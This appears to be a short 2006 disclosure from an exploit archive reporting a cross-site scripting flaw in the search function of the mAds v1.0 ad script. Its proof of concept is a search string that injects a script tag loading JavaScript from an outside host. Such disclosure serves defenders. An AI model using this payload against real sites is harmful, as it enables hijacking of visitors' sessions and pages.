mAds10.txt

mAds10.txt: Posted Jul 2, 2006; Authored by Luny; mAds version 1.0 is susceptible to a cross site scripting attack.; tags | exploit, xss; SHA-256 | fc36227ee12cb3147237e4c8cb08537035307d7ab7d06158b192b2cc3a8b9e7d; Download | Favorite | View

mAds10.txt

mAds v1.0

Homepage:
https://lowpricescripts.com/product_info.php?products_id=51

Affected files:

*Searching

-----------------------------------

XSS vuln when searching:

Like the hotbot XSS vuln, when searching mAds returns with its results they are generated dynamically on screen, with no filtering at all. For a PoC as your search string put in:

<script src=https://www.youfucktard.com/xss.js></script>

Screenshots:

https://www.youfucktard.com/xsp/mads1.jpg

Im sure other vulnerabilities aside from XSS could be also possible due to this.
------------------------------------

Top Authors In Last 30 Days

Red Hat 239 files
Ubuntu 62 files
Debian 23 files
LiquidWorm 20 files
Apple 9 files
indoushka 5 files
Gentoo 5 files
Google Security Research 4 files
Chokri Hammedi 3 files
Alter Prime 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,163)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,862)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,265)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,976)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

mAds10.txt

mAds10.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

mAds10.txt

Share This

mAds10.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems